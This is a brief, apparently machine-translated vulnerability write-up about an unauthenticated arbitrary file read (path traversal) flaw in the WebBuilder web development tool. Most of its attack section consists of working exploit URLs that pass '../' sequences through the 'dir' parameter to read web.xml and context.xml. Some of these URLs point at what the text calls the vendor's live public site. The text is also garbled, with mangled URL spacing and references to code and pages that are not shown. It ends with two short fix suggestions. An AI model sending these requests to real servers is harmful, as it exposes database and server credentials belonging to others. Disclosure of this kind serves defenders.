Open-source Web Application Development Tool WebBuilder Arbitrary File Reading and repair
Open-source Web Application Development Tool WebBuilder has the Arbitrary File Reading Vulnerability, which can leak key information such as server and database configuration.
Methods In the code can be used to read files from user-controlled paths:
View the database. The xwl that calls this method does not require logon verification. If you do not have the permission, you can also access it:
Therefore, access this URL:
The path where the Code reads the file is webbuilder/docs/. First, try to access the file in this folder:
Http: // localhost: 8080/wb/main? Xwl1_13o1avuenbsf&dir;@index.txt
Modify the dir parameter without filtering ../. For example, submit the web. xml Path:
Http: // localhost: 8080/wb/main? Xwl = 13O1AVUENBSF & dir = @.../WEB-INF/web. xml
Try again:
Http: // localhost: 8080/wb/main? Xwl = 13O1AVUENBSF & dir = @.../META-INF/context. xml
Test it on the official online user site of WebBuilder:
Http://www.putdb.com/main? Xwl = 13O1AVUENBSF & dir = @.../WEB-INF/web. xml
Http://www.putdb.com/main? Xwl = 13O1AVUENBSF & dir = @.../META-INF/context. xml
Solution:
1. filter ../.
2. Check the directory when reading the file.